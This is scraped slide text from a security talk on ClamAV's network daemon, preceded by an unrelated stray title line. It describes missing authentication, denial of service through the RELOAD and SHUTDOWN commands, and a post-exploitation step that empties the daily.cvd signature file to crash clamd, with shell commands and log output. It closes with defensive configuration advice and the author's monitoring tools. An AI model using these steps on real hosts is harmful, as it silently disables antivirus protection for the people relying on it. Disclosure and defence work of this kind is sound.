Presentation on how to chat with PDF using ChatGPT code interpreter
Baking even more Clam(AV)s for Fun & Profit.
1. Baking even more
Clam(AV)s for Fun &
Profit.
ClamAV in a network accessible configuration
provides not only remote virus scanning, but also
the potential for DOS, etc.
2. ClamAV-what it is.
Open Source Software
Provides Virus Scanning
Currently owned by Sourcefire Cisco Systems
3. ClamAV-Component Overview
What it does.
clamscan
cmd line scanner
Stand alone
freshclam
Signature DB update
tool
clamd
Scanning Server
Scanning clients
clamdscan
cmd line scanner
clamav-milter
email scanning
plugin
4. The Design Problems
In Theory
Configuration
Clamd can bind to an IP address
No Access Controls
No Authentication
No connection logging
Malformed DB Handling
5. The Implementation Problems
In Practice
Availability of Administrative Commands.
VERSION
Recon & Information disclosure
RELOAD
Default Virus DB size is about 74 MB
Continuous reloads result in High CPU utilization.
SHUTDOWN
Guess what that does?:-)
A DOS of a networked ClamAV installation.
Discussed on ClamAV-user mailing list
July 22-23 2011
6. Bug 2727
Use in Post Exploitation
clamconf|grep "DatabaseDirectory"
DatabaseDirectory = "/usr/local/share/clamav"
DatabaseDirectory = "/usr/local/share/clamav"
cd /usr/local/share/clamav
ls -lh *.cvd
-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd
-rw-r--r-- 1 clamav clamav 12M Nov 4 18:27 daily.cvd
-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
echo -n "" > daily.cvd
ls -lh *.cvd
-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd
-rw-r--r-- 1 clamav clamav 0 Nov 4 18:41 daily.cvd
-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd
7. Bug 2727
Use in Post Exploitation - Cont.d
Nov
Nov
Nov
Nov
Nov
Nov
Nov
Nov
Nov
4 18:43:50 host clamd[24481]: Reading databases from /usr/local/share/clamav
4 18:43:50 host clamd[24481]: reload db failed: Broken or not a CVD file
4 18:43:50 host clamd[24481]: Terminating because of a fatal error.
4 18:43:50 host clamd[24481]: Waiting for all threads to finish
4 18:43:50 host clamd[24481]: Shutting down the main sockets.
4 18:43:50 host clamd[24481]: Pid file removed.
4 18:43:50 host clamd[24481]: --- Stopped at Mon Nov 4 18:43:50 2013
4 18:43:50 host clamd[24481]: Closing the main sockets.
4 18:43:50 host clamd[24481]: Socket file removed.
8. Operational Impact
clamdscan -m /
ERROR: Can't connect to clamd: No such file or directory
----------- SCAN SUMMARY ----------Infected files: 0
Total errors: 1
Time: 0.000 sec (0 m 0 s)
9. The Defense
Configuration
Bind to a LOCAL Socket
Bind to loopback interface
Access Controls - FIREWALL
FIX THE BUGS! - Just Saying... :-)
Monitoring
11. Tools - Continued bragging
CCEE
CCEE 0.97.4
Initially a patch for bug 1754
Adds connection logging to clamd for
administrative commands
Adds other functionallity to ClamAV
Woefully Outdated
I am NOT a real c coder.
I DO have other things to do. :-)
12. Tools - Continued
Is he done yet? -- Almost. :-)
clamd.monitor
Monitor plugin for the mon framework
Can be used as a stand alone solution
Get them all and more at
http://www.cmpublishers.com/oss